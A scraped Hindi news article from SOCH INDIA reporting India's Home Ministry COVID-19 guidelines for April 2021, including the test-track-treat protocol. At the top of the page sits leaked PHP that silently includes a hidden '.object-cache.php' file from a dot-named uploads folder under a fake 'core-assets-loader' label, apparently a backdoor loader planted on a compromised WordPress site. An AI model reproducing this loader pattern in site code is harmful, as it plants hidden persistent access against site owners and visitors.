add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); Coronavirus की रफ्तार पर ब्रेक लगाने के लिए गृह मंत्रालय ने जारी किए नए नियम, 30 अप्रैल तक रहेंगे लागू – SOCH INDIA
Menu

देश
Coronavirus की रफ्तार पर ब्रेक लगाने के लिए गृह मंत्रालय ने जारी किए नए नियम, 30 अप्रैल तक रहेंगे लागू

nobanner

 कोरोना वायरस (Coronavirus) के बढ़ते मामलों ने सरकार की चिंता बढ़ा दी है. महामारी की रोकथाम के लिए गृह मंत्रालय ने नए दिशानिर्देश जारी कर दिए हैं. ये दिशानिर्देश 1 अप्रैल 2021 से 30 अप्रैल तक लागू रहेंगे. सरकार के निर्देश के मुताबिक राज्यों और केंद्रशासित प्रदेशों में 3T यानी कि टेस्ट-ट्रैक-ट्रीट प्रोटोकॉल (Test-Track-Treat) अपनाया जाएगा.

3T प्रोटोकॉल फॉलो करना जरूरी

गृह मंत्रालय के मुताबिक टेस्ट-ट्रैक-ट्रीट प्रोटोकॉल में जिन राज्यों और केंद्रशासित प्रदेशों में आरटीपीसीआर टेस्ट (RTPCR Test) की संख्या कम है वहां टेस्ट की संख्या बढ़ाई जाए. टेस्ट की संख्या को बढ़ाकर 70% तक लाया जाना चाहिए. नए पॉजिटिव मरीज मिलने के बाद उसके संपर्क में आए लोगों का जल्द से जल्द पता लगाकर उन्हें आइसोलेट करना चाहिए, उनकी टेस्टिंग के बाद जरूरत के हिसाब से उनका इलाज किया जाए.